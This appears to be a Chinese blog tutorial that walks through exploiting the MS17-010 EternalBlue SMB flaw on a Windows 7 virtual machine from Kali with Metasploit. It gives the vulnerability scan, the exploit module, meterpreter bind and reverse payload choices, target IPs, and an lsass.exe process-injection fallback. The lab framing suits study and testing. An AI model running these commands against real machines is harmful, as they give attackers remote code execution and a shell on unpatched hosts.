一、安裝MSF,windows下安裝也可以,直接安裝kali也可以,我是kali是攻擊主機,win7是靶機,都在虛擬機里。
1、windows下安裝MSF請參考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官網下載)
2、kali的安裝請直接去官網下載:https://www.kali.org/downloads/
3、漏洞攻擊文章請參考:https://bbs.ichunqiu.com/thread-23115-1-1.html
准備時候還是要說一下注意事項:
(1)請安裝相關ruby插件:
安裝過程是:打開msfconsole 然后輸入命令:
1 gem install ruby_smb
(2)一定要搞清楚win7主機防火牆和共享服務配置445需要open
(3)網絡環境要搞清楚,是否有訪問策略 是否有域認證等等,想明白了就像誰能發起連接。
#攻擊機可以主動發起連接,請使用正向payload windows/x64/meterpreter/bind_tcp
#雙向都可以主動發起連接的,請隨意。(反向的windows/x64/meterpreter/reverse_tcp)
#雙向都不可以的,或者攻擊機不可以的那就別玩了。
(4)可以先掃描看看是否有漏洞
1 use auxiliary/scanner/smb/smb_ms17_010 2 set RHOSTS [targetip] 3 run
二、開始攻擊:
1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129 4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135 5 msf exploit(ms17_010_eternalblue) > exploit
搞定收工
如果不行,麻煩加上這句:
1 set PROCESSINJECT lsass.exe
2 set TARGETARCHITECTURE x64